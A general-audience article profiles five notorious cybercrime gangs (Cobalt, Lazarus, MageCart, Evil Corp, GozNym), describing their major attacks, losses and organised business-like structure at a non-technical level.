Cybercrime is a threat that concerns us all. Prevention requires education, so now is the time to learn about the worst groups of cybercrime.
Organized cybercrime gangs have harnessed the potential of the Internet. In recent years, their operations have become so sophisticated that they have launched large-scale attacks on large companies and launched sinister cyber campaigns that have caused millions of dollars in damage.
Here are five of the most notorious cybercrime gangs that have made headlines.
Also read: Top 8 Internet frauds and scams of all time
1. Cobalt Cybercrime Gang
This cybercrime gang is behind the Carbanak and Cobalt malware attacks that have targeted 100 financial institutions in more than 40 countries around the world. Their complex cybercrime campaigns against numerous banks enabled these criminals to steal over $ 11 million per heist.
This has caused the financial sector more than a billion dollars in cumulative losses.
A typical Cobalt attack infiltrated banking institutions by sending spear-phishing emails containing malicious attachments to bank employees. Once downloaded, the criminals gained access to the infected computer and were able to infiltrate the internal banking network. They spent months inside the infected networks studying the bank’s operations and workflows.
It got even more sinister when they began to infiltrate the servers that controlled the ATMs. During the final heist – called “jackpotting” – the ATMs were instructed to dispense money remotely at some point in predetermined locations where a mule of money was waiting to collect the money.
The alleged mastermind was arrested in 2018, although experts now believe the remaining members picked up where it left off after seeing similar attacks on many other banks shortly after his arrest.
2. Lazarus Gang
The group some believe to be linked to North Korea is behind many nefarious attacks on institutions and organizations. The most notorious was the Sony Pictures breach in 2014 and the sinister campaign that hit England’s National Health Service (NHS) through the WannaCry cyberattack.
Sony Pictures Leak
During the infamous Sony Pictures leak, employees were shocked to discover that their corporate network had been hacked. The hackers stole terabytes of confidential data, deleted some files, and threatened to release the information if Sony refused the hackers’ requests.
Networks were down for days and employees were forced to use whiteboards. A few days later, the hackers began to disclose confidential information they had stolen from the press.
WannaCry Ransomware Attack
The Lazarus Group is also believed to be behind the 2017 WannaCry Ransomware attack that affected nearly a quarter of a million computers in 150 countries. It has crippled many businesses and organizations, including the UK NHS. It was the biggest attack the NHS has ever seen.
WannaCry crippled the operations of the health system for several days, resulted in the cancellation of more than six thousand appointments and cost the NHS around $ 100 million.
3. MageCart Syndicate
This large ecommerce hacking syndicate, made up of different groups under one big umbrella, rose to fame for stealing customer and credit card data.
A form of software skimming was designed for this, malware that hijacked payment systems at e-commerce sites, recording credit card details.
Over the years, MageCart groups have targeted thousands of ecommerce sites as well as other websites where users normally enter their credit card details. In 2018, for example, British Airways suffered a massive data breach by a MageCart group. The attack compromised the personal and financial information of 380,000 customers. But the attack on the airline was just the tip of the iceberg.
The massive MageCart digital card skimming campaign also targeted hardware retailer Newegg days after the British Airways attack. MageCart is also believed to be behind the Ticketmaster attack that compromised 40,000 customer information.
4. Evil Corp
The name of the band itself leaves no doubt that they’re there to cause trouble, millions of dollars in trouble to be exact. This international cybercrime gang with members based in Russia uses various types of malware to attack all kinds of institutions, including a school district in Pennsylvania.
Most of their targets are organizations in Europe and the United States and they have managed to evade arrest for years. Evil Corp rose to fame for the insidious Dridex banking Trojan which allowed the cybercrime group to collect login information from hundreds of banks and financial institutions in 40 countries.
At the height of the Dridex heist, Evil Corp managed to steal around $ 100 million.
They are so brazen that the videos of the alleged bosses displaying their supercars and lavish lifestyle went viral last year. And although they have already been formally indicted by the US government in December 2019, many experts believe that it will be difficult to bring their founders to trial in the United States.
The indictment also failed to deter the group. In fact, a slew of new attacks on American small and medium businesses in 2020 have been linked to Evil Corp. This includes the discovery in June 2020 by Symantec of a plan to attack dozens of American companies. Eight Fortune 500 companies have been targeted using a new generation of ransomware called WastedLocker.
5. GozNym Gang
This international cybercrime network is behind the GozNym malware, a powerful hybrid Trojan horse created to avoid detection by security solutions.
GozNym, considered a two-headed monster, is a hybrid of Nymaim and Gozi malware. The sinister merger allowed malware to sneak onto a customer’s computer through malicious attachments or links. From there, the malware remained virtually impossible to discover, waiting for the user to log into a bank account.
From there, the login details were harvested, the funds stolen and siphoned off to US and foreign banks, then washed up by mules. The attack affected more than 41,000 computers and stole some $ 100 million from account holders.
Organized Cybercrime Gangs
These international cybercrime gangs model their operations and business models after legitimate business organizations. So much so that security analysts claim to train new members, use collaboration tools, and even use service agreements between the “specialists” they hire.
Most, like the GozNym group, for example, have a CEO-like leader who hires project managers from the dark web. These project managers are specialists who are in charge of every part of the attack.
Take the GozNym gang, which had coding “specialists” who perfected their malware’s ability to evade security solutions, a separate team in charge of distribution, and another team of specialists took over the bank accounts. They also hired mules or money launderers (“drop masters”) who received the funds and redistributed them to gang members abroad.
It is this level of organization and precision that has allowed these groups to infiltrate even the most established organizations, wreaking massive havoc and stealing millions of dollars.
Understanding how they work is one of the key steps to winning the fight against cybercrime. Experts hope that by studying them, they could thwart attacks before they happen.